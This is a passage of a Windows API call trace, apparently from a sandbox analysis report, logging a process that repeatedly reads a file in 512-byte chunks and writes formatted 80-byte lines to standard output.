lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.088] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.088] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.089] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.089] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] GetFileType (hFile=0x4c) returned 0x1 [0115.089] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.089] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.090] GetFileType (hFile=0x4c) returned 0x1 [0115.090] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.091] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.091] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] GetFileType (hFile=0x4c) returned 0x1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.091] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.091] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.092] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.092] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.092] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.093] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.093] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] GetFileType (hFile=0x4c) returned 0x1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.093] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.094] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.094] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.094] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.095] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.095] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.095] GetFileType (hFile=0x4c) returned 0x1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] GetFileType (hFile=0x4c) returned 0x1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] GetFileType (hFile=0x4c) returned 0x1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] GetFileType (hFile=0x4c) returned 0x1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.096] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.096] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.096] GetFileType (hFile=0x4c) returned 0x1 [0115.096] ReadFile (in: hFile=0x54, 